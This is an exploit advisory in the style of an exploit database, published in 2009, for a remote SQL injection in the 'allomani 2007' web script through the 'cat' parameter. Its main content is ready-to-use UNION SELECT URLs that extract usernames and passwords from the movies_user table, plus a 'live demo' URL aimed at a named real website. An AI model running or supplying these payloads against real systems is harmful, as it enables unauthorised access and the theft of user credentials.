[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : allomani 2007 (cat) Remote SQL Injection Vulnerability
# Published : 2009-08-26
# Author : NeX HaCkeR
# Previous Title : PAD Site Scripts 3.6 (list.php string) SQL Injection Vulnerability
# Next Title : phpSANE 0.5.0 (save.php) Remote File Inclusion Vulnerability
==================
NaMe: allomani 2007 <= SQL Injection Vulnerability
Author : NeX HackEr
Contact: c2l@hotmail.com
==================
Script site : http://allomani.com
==================
ExplOiT:
UserName
http://www.xxx.com/path/index.php?action=browse&cat=-1 and 1=0 UNION AlL SELECT username,2,3 from movies_user
Password
http://www.xxx.com/path/index.php?action=browse&cat=-1 and 1=0 UNION AlL SELECT password,2,3 from movies_user
:)
==================
Live DemO:
http://www.leeen.net/index.php?action=browse&cat=43 and 1=0 UNION AlL SELECT username,2,3 from movies_user
+========================================================+
|
| Greetz.: ~ alMaFiA ~ RmZ AlJnooP ~ GaBsH ~
| And All Friends!!!!
+========================================================+
# www.Syue.com [2009-08-26]